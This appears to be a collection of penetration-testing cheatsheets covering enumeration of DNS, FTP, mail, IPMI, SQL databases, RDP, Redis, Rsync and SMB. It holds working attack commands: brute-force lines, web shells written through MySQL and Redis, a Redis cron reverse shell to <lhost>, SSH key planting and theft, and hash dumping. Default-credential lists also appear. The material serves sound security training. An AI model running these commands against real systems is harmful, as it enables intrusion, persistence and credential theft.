DNS

DNS Enumeration Cheatsheet Default Port: 53 (TCP/UDP) Key DNS Record Types Record Description A IPv4 address AAAA IPv6 address MX Mail server NS Name server TXT Text records (SPF, DMARC, verification) CNAME Canonical name / alias SOA Start of authority PTR Reverse lookup SRV Service location Basic Lookups # host host <domain> host -t A <domain> host -t MX <domain> host -t NS <domain> host -t TXT <domain> host -t CNAME <domain> # dig dig <domain> dig <domain> ANY dig <domain> A dig <domain> MX dig <domain> NS dig <domain> TXT dig @<nameserver> <domain> ANY +noall +answer # nslookup nslookup <domain> nslookup -type=MX <domain> nslookup -type=NS <domain> Zone Transfer dig axfr @<nameserver> <domain> host -l <domain> <nameserver> fierce --domain <domain> Subdomain Enumeration # dnsenum dnsenum --dnsserver <ns> --enum -p 0 -s 0 -o output.txt -f wordlist.txt <domain> dnsenum --enum inlanefreight.htb -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r # dnsrecon dnsrecon -d <domain> -t std # Standard enumeration dnsrecon -d <domain> -t axfr # Zone transfer attempt dnsrecon -d <domain> -t brt -D wordlist.txt # Brute force subdomains # gobuster DNS mode gobuster dns -d <domain> -w wordlist.txt -r <nameserver> # Sublist3r sublist3r -d <domain> # Amass amass enum -d <domain> amass enum -passive -d <domain> Nmap DNS Scripts nmap -p 53 --script dns-brute <domain> nmap -p 53 --script dns-zone-transfer \ --script-args dns-zone-transfer.domain=<domain> <nameserver> nmap -p 53 --script dns-nsid <nameserver> nmap -p 53 --script dns-recursion <nameserver> nmap -p 53 --script dns-cache-snoop <nameserver> Reverse DNS Lookup dig -x <ip> host <ip> dnsrecon -r <cidr> -t rvl # Example dig -x 192.168.1.1 host 192.168.1.1 Wordlists (SecLists) /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt

2 min · d3vilsec

FTP

FTP Enumeration Cheatsheet Default Ports: 21 (control), 20 (data - active mode) Banner Grabbing & Connection nc -nv <ip> 21 telnet <ip> 21 ftp <ip> openssl s_client -connect <ip>:21 -starttls ftp # FTPS Anonymous Login ftp <ip> # Username: anonymous # Password: anonymous (or leave blank) # Via curl curl -v ftp://<ip>/ --user anonymous:anonymous curl -v ftp://<ip>/<path>/ --user anonymous:anonymous FTP Commands (Once Connected) USER <username> # Send username PASS <password> # Send password SYST # Display system type STAT # Status / verbose file listing LIST # List files (verbose) NLST # Name list (simple) PWD # Print working directory CWD <dir> # Change directory GET <file> # Download file PUT <file> # Upload file MGET * # Download all files BINARY # Switch to binary transfer mode ASCII # Switch to ASCII transfer mode PASV # Enter passive mode QUIT # Disconnect Nmap FTP Scripts nmap -p 21 --script ftp-anon <ip> # Check anonymous login nmap -p 21 --script ftp-banner <ip> # Banner grab nmap -p 21 --script ftp-brute <ip> # Brute force credentials nmap -p 21 --script ftp-bounce <ip> # FTP bounce attack check nmap -p 21 --script ftp-syst <ip> # SYST command response nmap -p 21 --script ftp-vsftpd-backdoor <ip> # vsFTPd 2.3.4 backdoor check nmap -p 21 -sV --script ftp-* <ip> # Run all FTP scripts Brute Force hydra -l <user> -P wordlist.txt ftp://<ip> hydra -L users.txt -P wordlist.txt ftp://<ip> medusa -u <user> -P wordlist.txt -h <ip> -M ftp Bulk Download # wget recursive download (no passive mode) wget -m --no-passive ftp://anonymous:anonymous@<ip> # curl recursive curl -s ftp://<ip>/ --user anonymous:anonymous | awk '{print $NF}' | \ while read f; do curl -s ftp://<ip>/$f --user anonymous:anonymous -O; done Key Vulnerabilities Software CVE Description vsFTPd 2.3.4 CVE-2011-2523 Backdoor shell on port 6200 ProFTPd 1.3.5 CVE-2015-3306 mod_copy unauthenticated file copy ProFTPd 1.3.3c CVE-2010-4221 Remote heap overflow

2 min · d3vilsec

IMAP POP3

IMAP / POP3 Enumeration Cheatsheet Default Ports: IMAP: 143 (plain), 993 (SSL/TLS) POP3: 110 (plain), 995 (SSL/TLS) Banner Grabbing nc -nv <ip> 110 # POP3 nc -nv <ip> 143 # IMAP openssl s_client -connect <ip>:993 # IMAPS openssl s_client -connect <ip>:995 # POP3S openssl s_client -connect <ip>:143 -starttls imap # STARTTLS IMAP POP3 Commands (Manual) USER <username> PASS <password> STAT # Mailbox stats (message count, total size) LIST # List all messages with sizes LIST <n> # Info for message n RETR <n> # Retrieve (download) message n DELE <n> # Mark message n for deletion TOP <n> <lines> # Retrieve headers + first N lines of message n UIDL # Unique ID listing for all messages NOOP # Keep-alive RSET # Unmark any deletions QUIT # Commit deletes and disconnect IMAP Commands (Manual) a LOGIN <user> <pass> a CAPABILITY # Show server capabilities a LIST "" "*" # List all mailboxes a SELECT INBOX # Select inbox a STATUS INBOX (MESSAGES UNSEEN) # Inbox stats a FETCH 1:* (FLAGS) # List messages with flags a FETCH 1 (BODY[]) # Download full message 1 a FETCH 1 (BODY[HEADER]) # Headers only a FETCH 1 (BODY[TEXT]) # Body only a SEARCH ALL # Search all messages a SEARCH UNSEEN # Search unread messages a EXAMINE INBOX # Read-only select a LOGOUT Nmap Scripts nmap -p 110,143,993,995 --script imap-capabilities <ip> nmap -p 110,143,993,995 --script pop3-capabilities <ip> nmap -p 110 --script pop3-brute <ip> nmap -p 143 --script imap-brute <ip> nmap -p 993,995 --script imap-ntlm-info <ip> # Windows NTLM info leak Brute Force hydra -l <user> -P wordlist.txt imap://<ip> hydra -l <user> -P wordlist.txt pop3://<ip> hydra -l <user> -P wordlist.txt -s 993 -S imap://<ip> # IMAPS hydra -l <user> -P wordlist.txt -s 995 -S pop3://<ip> # POP3S curl Mail Access # List mailboxes curl -k 'imaps://<ip>' --user <user>:<pass> # List INBOX contents curl -k 'imaps://<ip>/INBOX' --user <user>:<pass> # Read specific message curl -k 'imaps://<ip>/INBOX;MAILINDEX=1' --user <user>:<pass> # POP3 via curl curl -k 'pop3s://<ip>' --user <user>:<pass> curl -k 'pop3s://<ip>/1' --user <user>:<pass> # Download message 1

2 min · d3vilsec

IPMI

IPMI Enumeration Cheatsheet Default Port: 623 (UDP) What is IPMI? Intelligent Platform Management Interface — out-of-band management for servers (iDRAC, iLO, BMC). Can give full remote control even if OS is down. Detection & Version nmap -sU -p 623 <ip> nmap -sU -p 623 --script ipmi-version <ip> Nmap Scripts nmap -sU -p 623 --script ipmi-version <ip> nmap -sU -p 623 --script ipmi-cipher-zero <ip> # Check for Cipher 0 auth bypass Metasploit Modules # Version detection use auxiliary/scanner/ipmi/ipmi_version set RHOSTS <ip> run # Dump RAKP hashes (no auth needed) use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS <ip> run # Cipher 0 auth bypass (unauthenticated admin access) use auxiliary/scanner/ipmi/ipmi_cipher_zero set RHOSTS <ip> run ipmitool (Direct Interaction) # Version/status ipmitool -I lanplus -H <ip> -U admin -P admin chassis status # List users ipmitool -I lanplus -H <ip> -U admin -P admin user list # LAN config ipmitool -I lanplus -H <ip> -U admin -P admin lan print # Power control ipmitool -I lanplus -H <ip> -U admin -P admin power status ipmitool -I lanplus -H <ip> -U admin -P admin power reset # Add user (post-compromise) ipmitool -I lanplus -H <ip> -U admin -P admin user set name 4 hacker ipmitool -I lanplus -H <ip> -U admin -P admin user set password 4 Password1 ipmitool -I lanplus -H <ip> -U admin -P admin user priv 4 4 # Admin priv ipmitool -I lanplus -H <ip> -U admin -P admin user enable 4 Hash Cracking (After RAKP Dump) # Hashcat mode 7300 = IPMI2 RAKP HMAC-SHA1 hashcat -m 7300 hashes.txt wordlist.txt hashcat -m 7300 hashes.txt wordlist.txt -r rules/best64.rule Default Credentials Vendor / Interface Username Default Password Dell iDRAC root calvin HP iLO Administrator (printed on pull tab) Supermicro IPMI ADMIN ADMIN IBM IMM USERID PASSW0RD Cisco CIMC admin password Intel RMM admin (blank) Key Vulnerabilities Issue Description Cipher 0 Allows unauthenticated auth bypass — attacker can set any password RAKP hash dump IPMI spec allows anyone to request auth hash → offline crack Default creds Most systems ship with known default credentials Anonymous auth Some BMCs allow completely anonymous access

2 min · d3vilsec

MSSQL

MSSQL Enumeration Cheatsheet Default Ports: 1433 (TCP), 1434 (UDP — SQL Server Browser) Discovery & Nmap Scripts nmap -p 1433 --script ms-sql-info <ip> nmap -p 1433 --script ms-sql-config <ip> nmap -p 1433 --script ms-sql-empty-password <ip> nmap -p 1433 --script ms-sql-brute <ip> nmap -sU -p 1434 --script ms-sql-dac <ip> # Discover dynamic ports via UDP nmap -p 1433 --script ms-sql-* <ip> # All MSSQL scripts Metasploit Modules use auxiliary/scanner/mssql/mssql_ping # Discovery + version use auxiliary/scanner/mssql/mssql_login # Brute force auth use auxiliary/admin/mssql/mssql_sql # Execute SQL query use auxiliary/admin/mssql/mssql_exec # OS command execution (xp_cmdshell) use auxiliary/admin/mssql/mssql_enum # Full enumeration use auxiliary/admin/mssql/mssql_enum_sql_logins # Enumerate SQL logins mssqlclient.py (impacket) # Connect with SQL auth python3 mssqlclient.py <user>:<pass>@<ip> # Connect with Windows auth python3 mssqlclient.py <domain>/<user>:<pass>@<ip> -windows-auth # Connect with hash (Pass-the-Hash) python3 mssqlclient.py <domain>/<user>@<ip> -hashes :<nthash> -windows-auth Useful SQL Queries -- Version and user info SELECT @@version; SELECT system_user; SELECT user_name(); SELECT DB_NAME(); -- Check if sysadmin SELECT IS_SRVROLEMEMBER('sysadmin'); SELECT IS_MEMBER('db_owner'); -- List databases SELECT name FROM sys.databases; USE <database>; SELECT table_name FROM information_schema.tables; -- List users and roles SELECT name, type_desc FROM sys.server_principals; SELECT name FROM sys.syslogins; SELECT roles.name FROM sys.server_role_members JOIN sys.server_principals AS roles ON roles.principal_id = server_role_members.role_principal_id JOIN sys.server_principals AS members ON members.principal_id = server_role_members.member_principal_id WHERE members.name = '<user>'; xp_cmdshell (OS Command Execution) -- Enable xp_cmdshell (requires sysadmin) EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- Run commands EXEC xp_cmdshell 'whoami'; EXEC xp_cmdshell 'net user'; EXEC xp_cmdshell 'powershell -enc <base64payload>'; Linked Servers (Lateral Movement) -- Enumerate linked servers SELECT * FROM sys.servers; EXEC sp_linkedservers; -- Execute query on linked server EXECUTE('SELECT @@version') AT [<linked_server>]; EXECUTE('SELECT system_user') AT [<linked_server>]; -- Execute OS command via linked server EXECUTE('EXEC xp_cmdshell ''whoami''') AT [<linked_server>]; Brute Force hydra -l sa -P wordlist.txt mssql://<ip> medusa -h <ip> -u sa -P wordlist.txt -M mssql crackmapexec mssql <ip> -u <user> -p wordlist.txt File Read / Write -- Read file (via BULK INSERT or OPENROWSET) SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS t; -- Write file (via xp_cmdshell) EXEC xp_cmdshell 'echo hacked > C:\inetpub\wwwroot\shell.txt';

2 min · d3vilsec

MySQL

MySQL Enumeration Cheatsheet Default Port: 3306 (TCP) Connection & Banner Grabbing nc -nv <ip> 3306 # Banner grab mysql -u root -h <ip> # No password mysql -u root -p -h <ip> # Prompt for password mysql -u root -p<password> -h <ip> # Inline password (no space) mysql -u root -h <ip> -e "SELECT version();" # One-liner query Nmap Scripts nmap -p 3306 --script mysql-info <ip> nmap -p 3306 --script mysql-databases \ --script-args mysqluser=root,mysqlpass='' <ip> nmap -p 3306 --script mysql-empty-password <ip> nmap -p 3306 --script mysql-brute <ip> nmap -p 3306 --script mysql-audit <ip> nmap -p 3306 --script mysql-vuln-cve2012-2122 <ip> nmap -p 3306 --script mysql-* <ip> # All MySQL scripts Enumeration Queries -- Version and environment SELECT version(); SELECT @@version; SELECT user(); SELECT @@datadir; SELECT @@basedir; SELECT @@hostname; -- Databases and tables SHOW databases; USE <database>; SHOW tables; DESCRIBE <table>; SELECT * FROM <table> LIMIT 5; SELECT table_schema, table_name FROM information_schema.tables; -- Users and privileges SELECT user, host, authentication_string FROM mysql.user; SELECT user, host, password FROM mysql.user; -- older MySQL SELECT * FROM information_schema.user_privileges; SHOW GRANTS FOR '<user>'@'<host>'; SHOW GRANTS FOR CURRENT_USER(); -- Check FILE privilege SELECT user, host, File_priv FROM mysql.user; File Read / Write (Requires FILE Privilege) -- Read files SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('/etc/shadow'); SELECT LOAD_FILE('C:/Windows/System32/drivers/etc/hosts'); -- Write files (web shell) SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; -- Write SSH key SELECT 'ssh-rsa AAAA...' INTO OUTFILE '/root/.ssh/authorized_keys'; Brute Force hydra -l root -P wordlist.txt mysql://<ip> hydra -L users.txt -P wordlist.txt mysql://<ip> medusa -h <ip> -u root -P wordlist.txt -M mysql User-Defined Functions (UDF) for Privilege Escalation -- Check if plugin dir is writable (post-login) SHOW variables LIKE 'plugin_dir'; -- Drop malicious UDF .so/.dll into plugin dir, -- then create the function and execute OS commands CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('id > /tmp/out'); Common Credentials to Try root : (blank) root : root root : password root : mysql root : toor admin : admin

2 min · d3vilsec

Nmap

Nmap Cheatsheet Default Ports: N/A (scanner tool) Scan Types Flag Description -sS SYN scan (stealth, default with root) -sT TCP connect scan (no root needed) -sU UDP scan -sV Service/version detection -sC Default scripts -sA ACK scan (firewall mapping) -sN NULL scan -sF FIN scan -sX Xmas scan -sn Ping sweep (no port scan) -O OS detection -A Aggressive (OS + version + scripts + traceroute) Port Specification nmap -p 22 # Single port nmap -p 22,80,443 # Multiple ports nmap -p 1-1024 # Port range nmap -p- # All 65535 ports nmap --top-ports 1000 # Top 1000 ports nmap -F # Fast scan (top 100) Timing Templates Flag Name Description -T0 Paranoid IDS evasion, very slow -T1 Sneaky Slow, IDS evasion -T2 Polite Slower, less bandwidth -T3 Normal Default -T4 Aggressive Faster, reliable network -T5 Insane Very fast, may miss results Output Formats nmap -oN output.txt # Normal output nmap -oX output.xml # XML output nmap -oG output.gnmap # Grepable output nmap -oA output # All formats at once Host Discovery nmap -sn 192.168.1.0/24 # Ping sweep nmap -PS22,80,443 192.168.1.0/24 # TCP SYN ping nmap -PA80 192.168.1.0/24 # TCP ACK ping nmap -PU53 192.168.1.0/24 # UDP ping nmap -PE 192.168.1.0/24 # ICMP echo ping nmap --disable-arp-ping 192.168.1.1 # Skip ARP discovery Evasion & Spoofing nmap -D RND:5 <target> # Decoy scan (5 random decoys) nmap -D decoy1,decoy2 <target> # Named decoys nmap -S <spoof-ip> <target> # Spoof source IP nmap --spoof-mac 0 <target> # Random MAC spoof nmap -f <target> # Fragment packets nmap --mtu 24 <target> # Custom MTU (must be multiple of 8) nmap --data-length 25 <target> # Append random data to packets nmap --scan-delay 5s <target> # Delay between probes nmap -sI <zombie> <target> # Idle/zombie scan nmap --proxies socks4://host:port # Route through proxy NSE Scripts nmap --script=<name> <target> # Run specific script nmap --script=<category> <target> # Run entire category nmap --script-help=<name> # Get help for a script nmap --script-updatedb # Update script database # Script categories: # auth, broadcast, brute, default, discovery, # dos, exploit, external, fuzzer, intrusive, # malware, safe, version, vuln Common Scan Combos # Quick full port scan nmap -p- --min-rate 5000 -T4 <target> # Detailed enum after port discovery nmap -p <ports> -sV -sC -O <target> # Aggressive all-in-one nmap -A -p- <target> # Stealth SYN + version detection nmap -sS -sV -p- -T4 <target> # UDP top ports nmap -sU --top-ports 100 <target> # Vulnerability scan nmap --script vuln <target> # Banner grabbing nmap -sV --script banner <target>

2 min · d3vilsec

Oracle TNS

Oracle TNS Enumeration Cheatsheet Default Port: 1521 (TCP) Nmap Scripts nmap -p 1521 --script oracle-tns-version <ip> nmap -p 1521 --script oracle-sid-brute <ip> nmap -p 1521 --script oracle-brute <ip> nmap -p 1521 --script oracle-brute-stealth <ip> nmap -p 1521 --script oracle-enum-users \ --script-args oracle-enum-users.sid=<sid> <ip> ODAT (Oracle Database Attacking Tool) # Full automated scan odat all -s <ip> -p 1521 # SID brute force odat sidguesser -s <ip> -p 1521 # Password brute force (after getting SID) odat passwordguesser -s <ip> -p 1521 -d <sid> # File read/write (requires UTL_FILE privilege) odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd /tmp/passwd.txt odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --putFile /tmp shell.php shell.php # OS command execution (requires Java) odat java -s <ip> -d <sid> -U <user> -P <pass> --exec "whoami" # External table method for file read odat externaltable -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd sqlplus (Direct Connection) # Install: sudo apt install oracle-instantclient-sqlplus # Connect sqlplus <user>/<pass>@<ip>:<port>/<sid> sqlplus <user>/<pass>@<ip>:<port>/<sid> as sysdba sqlplus <user>/<pass>@//<ip>:<port>/<service_name> Common SIDs to Try XE ORCL DB DATABASE PROD TEST DEV ORACLE OEMREP ORACLR_CONNECTION_DATA Enumeration Queries (Once Connected) -- Version and user SELECT * FROM v$version; SELECT user FROM dual; SELECT * FROM session_privs; -- Database objects SELECT * FROM all_tables; SELECT owner, table_name FROM all_tables WHERE owner != 'SYS'; SELECT column_name, data_type FROM all_tab_columns WHERE table_name = '<TABLE>'; -- Users and privileges SELECT username FROM dba_users; SELECT * FROM user_role_privs; SELECT * FROM dba_sys_privs WHERE grantee = '<user>'; -- Password hashes (as SYSDBA) SELECT name, password FROM sys.user$; SELECT name, spare4 FROM sys.user$; -- SHA-1 hashes (11g+) -- Check for DBA role SELECT * FROM session_privs WHERE privilege = 'CREATE SESSION'; Privilege Escalation via Java -- Grant Java permissions (as DBA) EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute'); EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); -- Execute OS command via Java SELECT dbms_java.runjava('oracle/aurora/util/Wrapper /bin/bash -c "id > /tmp/out"') FROM dual; Brute Force hydra -l <user> -P wordlist.txt -s 1521 oracle://<ip>/<sid> nmap -p 1521 --script oracle-brute \ --script-args oracle-brute.sid=<sid> <ip> Default Credentials Username Password Notes sys change_on_install sysdba system manager scott tiger Classic demo user dbsnmp dbsnmp SNMP agent mdsys mdsys hr hr

2 min · d3vilsec

R Services

R-Services Enumeration Cheatsheet Default Ports: rexec: 512 (TCP) rlogin: 513 (TCP) rsh / rcp: 514 (TCP) rpcbind / portmapper: 111 (TCP/UDP) Note: R-services transmit data in cleartext and rely on IP-based trust. They are largely obsolete but still found in legacy Unix/Linux environments. Detection nmap -p 512-514 <ip> nmap -p 512-514 -sV <ip> nmap -p 111 <ip> rlogin # Login as current user rlogin <ip> # Login as specific user rlogin -l <user> <ip> rsh (Remote Shell) # Execute command remotely rsh <ip> <command> rsh -l <user> <ip> whoami rsh -l <user> <ip> cat /etc/passwd rsh -l <user> <ip> /bin/bash rexec (Remote Exec) rexec <ip> -l <user> <command> rexec <ip> -l <user> id rpcbind / Portmapper (Port 111) # List all registered RPC services rpcinfo -p <ip> # List NFS mounts (if NFS is running) showmount -e <ip> # Nmap nmap -p 111 --script rpcinfo <ip> nmap -p 111 --script nfs-ls <ip> nmap -p 111 --script nfs-showmount <ip> nmap -p 111 --script nfs-statfs <ip> rwho / ruptime # List logged-in users across trusted hosts rwho # Show uptime across trusted hosts ruptime Trust Files (Critical Targets) These files define which hosts/users can connect without a password: ...

2 min · d3vilsec

RDP

RDP Enumeration Cheatsheet Default Port: 3389 (TCP) Detection & Info Gathering nmap -p 3389 -sV <ip> nmap -p 3389 --script rdp-enum-encryption <ip> nmap -p 3389 --script rdp-vuln-ms12-020 <ip> nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-ntlm-info <ip> Check NLA (Network Level Auth) # If NLA is required, credential prompt appears BEFORE full connection nmap -p 3389 --script rdp-enum-encryption <ip> # Look for: "Security layer: NLA" or "CredSSP" # rdp_check.py (impacket) — tests credential validity python3 rdp_check.py <domain>/<user>:<pass>@<ip> Password Attacks # Hydra hydra -l <user> -P wordlist.txt rdp://<ip> hydra -L users.txt -P wordlist.txt rdp://<ip> hydra -l <user> -P wordlist.txt rdp://<ip> -t 4 # Limit threads (RDP is picky) # Crowbar crowbar -b rdp -s <ip>/32 -u <user> -C wordlist.txt crowbar -b rdp -s 192.168.1.0/24 -U users.txt -C wordlist.txt # Metasploit use auxiliary/scanner/rdp/rdp_scanner set RHOSTS <ip> run Connecting via Linux # xfreerdp (recommended) xfreerdp /u:<user> /p:<pass> /v:<ip> xfreerdp /u:<user> /p:<pass> /v:<ip> /d:<domain> xfreerdp /u:<user> /p:<pass> /v:<ip> /drive:share,/tmp # Mount local dir xfreerdp /u:<user> /p:<pass> /v:<ip> /cert-ignore # Ignore cert errors xfreerdp /u:<user> /h:<nthash> /v:<ip> # Pass-the-Hash # rdesktop rdesktop <ip> rdesktop -u <user> -p <pass> -d <domain> <ip> # Remmina (GUI) remmina -c rdp://<user>@<ip> Session Hijacking (Post-Exploitation) # List sessions (on Windows target) query session query user # Hijack disconnected session (as SYSTEM) tscon <session_id> /dest:<current_session> Key Vulnerabilities CVE Name Affected Systems Description CVE-2019-0708 BlueKeep Win7, WinXP, Server 2008 Pre-auth RCE via RDP CVE-2019-1181 DejaBlue Win8, Win10, Server 2012+ Pre-auth RCE via RDP CVE-2019-1182 DejaBlue Win8, Win10, Server 2012+ Pre-auth RCE via RDP CVE-2012-0002 MS12-020 Multiple DoS / potential code execution BlueKeep Check (Metasploit) use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set RHOSTS <ip> run Useful Options # Custom RDP port xfreerdp /u:<user> /p:<pass> /v:<ip>:<port> # Enable clipboard sharing xfreerdp /u:<user> /p:<pass> /v:<ip> +clipboard # Full screen xfreerdp /u:<user> /p:<pass> /v:<ip> /f # Dynamic resolution xfreerdp /u:<user> /p:<pass> /v:<ip> /dynamic-resolution

2 min · d3vilsec

Redis

Redis Enumeration Cheatsheet Default Port: 6379 (TCP) — often unauthenticated and bound to all interfaces Initial Scanning nmap -p 6379 -sV <ip> nmap -p 6379 --script redis-info <ip> # Server info / config nmap -p 6379 --script redis-* <ip> # All Redis scripts Connecting # Install client sudo apt install redis-tools # Connect (no auth) redis-cli -h <ip> redis-cli -h <ip> -p 6379 # Authenticated redis-cli -h <ip> -a <password> redis-cli -h <ip> -a <password> --no-auth-warning # One-off command without interactive shell redis-cli -h <ip> INFO # Raw connection (no client installed) nc <ip> 6379 # then type: INFO (end with CRLF) Basic Enumeration # Inside redis-cli (or: redis-cli -h <ip> <command>) INFO # Full server info (version, OS, role, etc.) INFO server # Just server section INFO keyspace # Databases in use and key counts CONFIG GET * # Dump all config values CONFIG GET dir # Working directory (useful for writes) CONFIG GET dbfilename # RDB filename CLIENT LIST # Connected clients COMMAND COUNT # Number of available commands ACL WHOAMI # Current user (Redis 6+) ACL LIST # Access control rules (Redis 6+) Exploring Data SELECT <n> # Switch DB index (default 0) DBSIZE # Number of keys in current DB KEYS * # List ALL keys (heavy on large DBs) SCAN 0 # Cursor-based key iteration (safer) RANDOMKEY # Return a random key # Inspect a key TYPE <key> # Data type (string, list, set, hash, zset) TTL <key> # Time to live # Read by type GET <key> # string LRANGE <key> 0 -1 # list SMEMBERS <key> # set HGETALL <key> # hash ZRANGE <key> 0 -1 # sorted set # Dump everything quickly redis-cli -h <ip> --scan | while read k; do echo "$k => $(redis-cli -h <ip> GET "$k")"; done Authentication Notes # Check if auth is required redis-cli -h <ip> PING # -> PONG = no auth (open!) # -> NOAUTH ... = password required # Brute force with nmap nmap -p 6379 --script redis-brute <ip> # Brute force with hydra hydra -P /usr/share/wordlists/rockyou.txt redis://<ip> RCE / Post-Exploitation (Authorised testing only) # 1. Web shell via RDB write (if web root is writable & known) redis-cli -h <ip> CONFIG SET dir /var/www/html CONFIG SET dbfilename shell.php SET test "<?php system($_GET['cmd']); ?>" SAVE # -> browse to http://<ip>/shell.php?cmd=id # 2. SSH key injection (if redis runs as a user with ~/.ssh writable) (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt redis-cli -h <ip> -x SET sshkey < key.txt redis-cli -h <ip> CONFIG SET dir /root/.ssh CONFIG SET dbfilename authorized_keys SET sshkey "..." SAVE # -> ssh -i id_rsa root@<ip> # 3. Cron job injection (write to /var/spool/cron) CONFIG SET dir /var/spool/cron/crontabs CONFIG SET dbfilename root SET shell "\n\n* * * * * bash -i >& /dev/tcp/<lhost>/<lport> 0>&1\n\n" SAVE Module loading (Redis 4.x/5.x): MODULE LOAD <path> can load a malicious .so for RCE (e.g. RedisModules-ExecuteCommand / exp.so). Newer versions restrict this. ...

4 min · d3vilsec

Rsync

Rsync Enumeration Cheatsheet Default Port: 873 (TCP) Detection nmap -p 873 <ip> nmap -p 873 -sV <ip> nmap -p 873 --script rsync-list-modules <ip> nc -nv <ip> 873 List Available Modules (Shares) # List modules (no auth) rsync -av --list-only rsync://<ip>/ rsync rsync://<ip>/ # nc banner grab nc -nv <ip> 873 # Then type: #list Enumerate Files in a Module rsync -av --list-only rsync://<ip>/<module>/ rsync -av --list-only rsync://<ip>/<module>/subdir/ # Recursive listing of entire module rsync -r --list-only rsync://<ip>/<module>/ Download Files # Download single file rsync rsync://<ip>/<module>/file.txt ./ # Download entire module rsync -av rsync://<ip>/<module>/ ./local_copy/ # With credentials rsync -av rsync://<user>@<ip>/<module>/ ./ rsync --password-file=pass.txt rsync://<user>@<ip>/<module>/ ./ # Dry run (see what would be downloaded) rsync -av --dry-run rsync://<ip>/<module>/ ./ Upload Files # Upload single file rsync -av ./shell.php rsync://<user>@<ip>/<module>/ # Upload directory rsync -av ./payload/ rsync://<user>@<ip>/<module>/uploads/ # With password file rsync --password-file=pass.txt -av ./file rsync://<user>@<ip>/<module>/ High-Value Paths to Check rsync -av --list-only rsync://<ip>/home/ rsync -av --list-only rsync://<ip>/root/ rsync -av --list-only rsync://<ip>/etc/ rsync -av --list-only rsync://<ip>/backup/ rsync -av --list-only rsync://<ip>/var/www/ rsync -av --list-only rsync://<ip>/.ssh/ SSH Key Theft & Planting # Download .ssh directory rsync -av rsync://<ip>/home/<user>/.ssh/ ./stolen_keys/ # Plant authorized_keys (if write access) rsync -av ~/.ssh/id_rsa.pub rsync://<user>@<ip>/home/<user>/.ssh/authorized_keys Nmap Scripts nmap -p 873 --script rsync-list-modules <ip>

1 min · d3vilsec

SMB

SMB Enumeration Cheatsheet Default Ports: 445 (TCP), 139 (TCP/NetBIOS), 137–138 (UDP) Initial Scanning nmap -p 139,445 -sV <ip> nmap -p 445 --script smb-os-discovery <ip> nmap -p 445 --script smb-security-mode <ip> nmap -p 445 --script smb2-security-mode <ip> nmap -p 139,445 --script smb-* <ip> # All SMB scripts nmap -p 445 --script smb-vuln-* <ip> # All vuln checks NetBIOS / NBT Scanning nbtscan <ip> nbtscan -r 192.168.1.0/24 nmblookup -A <ip> enum4linux / enum4linux-ng # Classic enum4linux -a <ip> # All checks enum4linux -u <user> -p <pass> <ip> # Authenticated enum4linux -S <ip> # Shares only enum4linux -U <ip> # Users only enum4linux -P <ip> # Password policy # Newer (recommended) enum4linux-ng -A <ip> enum4linux-ng -A <ip> -u <user> -p <pass> enum4linux-ng -A <ip> -oA output smbclient # List shares smbclient -L //<ip>/ -N # Null session smbclient -L //<ip>/ -U <user>%<pass> # Authenticated # Connect to share smbclient //<ip>/<share> -N smbclient //<ip>/<share> -U <user>%<pass> smbclient //<ip>/<share> -U <domain>/<user>%<pass> # Within smbclient shell ls # List files cd <dir> # Change directory get <file> # Download file put <file> # Upload file recurse ON # Enable recursive operations prompt OFF # Disable prompts mget * # Download everything mput * # Upload everything CrackMapExec (CME) # Basic info crackmapexec smb <ip> crackmapexec smb 192.168.1.0/24 # Authenticated enum crackmapexec smb <ip> -u <user> -p <pass> crackmapexec smb <ip> -u <user> -p <pass> --shares crackmapexec smb <ip> -u <user> -p <pass> --users crackmapexec smb <ip> -u <user> -p <pass> --groups crackmapexec smb <ip> -u <user> -p <pass> --sessions crackmapexec smb <ip> -u <user> -p <pass> --loggedon-users crackmapexec smb <ip> -u <user> -p <pass> --local-groups # Credential spraying crackmapexec smb 192.168.1.0/24 -u <user> -p <pass> --continue-on-success # Pass-the-Hash crackmapexec smb <ip> -u <user> -H <nthash> # Command execution crackmapexec smb <ip> -u <user> -p <pass> -x 'whoami' # CMD crackmapexec smb <ip> -u <user> -p <pass> -X 'whoami' # PowerShell # Dump SAM/LSA crackmapexec smb <ip> -u <user> -p <pass> --sam crackmapexec smb <ip> -u <user> -p <pass> --lsa crackmapexec smb <ip> -u <user> -p <pass> -M ntdsutil # NTDS.dit impacket Tools python3 smbclient.py <domain>/<user>:<pass>@<ip> python3 samrdump.py <domain>/<user>:<pass>@<ip> python3 rpcdump.py <domain>/<user>:<pass>@<ip> python3 lookupsid.py <domain>/<user>:<pass>@<ip> python3 secretsdump.py <domain>/<user>:<pass>@<ip> # Dump all hashes python3 secretsdump.py -just-dc-ntlm <domain>/<user>:<pass>@<ip> Mounting SMB Shares # Linux mount sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass> sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass>,domain=<domain> Key Vulnerabilities CVE Name Description CVE-2017-0144 EternalBlue / MS17-010 SMBv1 RCE — WannaCry / NotPetya CVE-2020-0796 SMBGhost SMBv3.1.1 compression RCE CVE-2021-34527 PrintNightmare Print Spooler RCE via SMB # EternalBlue check nmap -p 445 --script smb-vuln-ms17-010 <ip> use 